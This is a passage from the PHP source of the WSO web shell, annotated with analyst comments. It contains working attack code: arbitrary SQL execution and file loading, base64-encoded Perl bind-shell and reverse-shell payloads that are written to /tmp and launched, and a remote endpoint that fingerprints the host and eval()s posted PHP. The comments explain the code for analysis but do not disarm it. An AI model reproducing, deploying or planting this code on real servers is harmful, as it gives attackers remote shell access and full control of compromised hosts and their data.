                echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?' ':" <small>({$n['n']})</small>") . "</nobr><br>";
            }
            echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
            // 'select' = paginated table view (30 rows per page); it is rewritten into a 'query'
            // with an engine-specific LIMIT clause and falls through to the query branch below.
            if(@$_POST['p1'] == 'select') {
                $_POST['p1'] = 'query';
                $_POST['p3'] = $_POST['p3']?$_POST['p3']:1;
                $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
                $num = $db->fetch();
                $pages = ceil($num['n'] / 30);
                echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">";
                echo " of $pages";
                if($_POST['p3'] > 1)
                    echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>< Prev</a>";
                if($_POST['p3'] < $pages)
                    echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next ></a>";
                $_POST['p3']--;
                if($_POST['type']=='pgsql')
                    $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
                else
                    $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
                echo "<br><br>";
            }
            // Free-form query execution; results rendered as an HTML table.
            if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {
                $db->query(@$_POST['p2']);
                if($db->res !== false) {
                    $title = false;
                    echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">';
                    $line = 1;
                    while($item = $db->fetch()) {
                        if(!$title) {
                            echo '<tr>';
                            foreach($item as $key => $value)
                                echo '<th>'.$key.'</th>';
                            reset($item);
                            $title=true;
                            echo '</tr><tr>';
                            $line = 2;
                        }
                        echo '<tr class="l'.$line.'">';
                        $line = $line==1?2:1;
                        foreach($item as $key => $value) {
                            if($value == null)
                                echo '<td><i>null</i></td>';
                            else
                                echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
                        }
                        echo '</tr>';
                    }
                    echo '</table>';
                } else {
                    echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
                }
            }
            echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
            if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile'))
                echo htmlspecialchars($_POST['p2']);
            echo "</textarea><br/><input type=submit value='Execute'>";
            echo "</td></tr>";
        }
        echo "</table></form><br/>";
        // The "Load file" form is only offered when the connected MySQL account has File_priv.
        if($_POST['type']=='mysql') {
            $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
            if($db->fetch())
                echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
        }
        if(@$_POST['p1'] == 'loadfile') {
            $file = $db->loadFile($_POST['p2']);
            echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
        }
    } else {
        echo htmlspecialchars($db->error());
    }
    echo '</div>';
    wsoFooter();
}
// Analyst note: drops and launches Perl helpers. The two payloads are base64-encoded Perl scripts
// (the form labels them "Bind port to /bin/sh" and "Back-connect"). cf() decodes one to
// /tmp/bp.pl or /tmp/bc.pl, wsoEx() starts it in the background and lists it with
// "ps aux | grep", then the file is unlinked — so the running perl process (default port 31337,
// back-connect target defaulting to the requester's REMOTE_ADDR) is the surviving artifact.
function actionNetwork() {
    wsoHeader();
    $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
    $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
    echo "<h1>Network tools</h1><div class=content>

 <form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">
 <span>Bind port to /bin/sh [perl]</span><br/>
 Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
 </form>
 <form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">
 <span>Back-connect [perl]</span><br/>
 Server: <input type='text' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>

 </form><br>";
    if(isset($_POST['p1'])) {
        // Writes the base64-decoded payload $t to path $f.
        function cf($f,$t) {
            $w = @fopen($f,"w") or @function_exists('file_put_contents');
            if($w){
                @fwrite($w,@base64_decode($t));
                @fclose($w);
            }
        }
        if($_POST['p1'] == 'bpp') {
            // Bind variant: port from p2.
            cf("/tmp/bp.pl",$bind_port_p);
            $out = wsoEx("perl /tmp/bp.pl ".$_POST['p2']." 1>/dev/null 2>&1 &");
            echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bp.pl")."</pre>";
            unlink("/tmp/bp.pl");
        }
        if($_POST['p1'] == 'bcp') {
            // Back-connect variant: server from p2, port from p3.
            cf("/tmp/bc.pl",$back_connect_p);
            $out = wsoEx("perl /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." 1>/dev/null 2>&1 &");
            echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bc.pl")."</pre>";
            unlink("/tmp/bc.pl");
        }
    }
    echo '</div>';
    wsoFooter();
}
// Analyst note: remote-control endpoint. Without p1 it returns a serialize()d fingerprint
// (uname, PHP version, WSO_VERSION, safe_mode), which makes live instances easy to identify
// automatically; with p1 it eval()s the posted PHP directly. No HTML is rendered in either case.
function actionRC() {
    if(!@$_POST['p1']) {
        $a = array(
            "uname" => php_uname(),
            "php_version" => phpversion(),
            "wso_version" => WSO_VERSION,
            "safemode" => @ini_get('safe_mode')
        );
        echo serialize($a);
    } else {
        eval($_POST['p1']);
    }
}
// Analyst note: action dispatch. The handler name is "action" . $_POST['a'] invoked through
// call_user_func(), so every action* function above is reachable by POSTing its suffix in 'a'.
// With no 'a', $default_action (declared near the top of the file) is used if such a handler
// exists, otherwise SecInfo.
if( empty($_POST['a']) )
    if(isset($default_action) && function_exists('action' . $default_action))
        $_POST['a'] = $default_action;
    else
        $_POST['a'] = 'SecInfo';
if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
    call_user_func('action' . $_POST['a']);
// Generic cURL fetch helper: follows redirects, 30 s timeout, returns the body or false.
// Not referenced anywhere in the visible portion of the file. $cheader is never defined in this
// scope (no parameter, no global), so the User-Agent value resolves to an empty string.
function FetchURL($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_USERAGENT, "$cheader");
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    $data = curl_exec($ch);
    if(!$data) {
        return false;
    }
    return $data;
}
// Explicit end of the request after dispatch; nothing below is reachable.
exit;
?>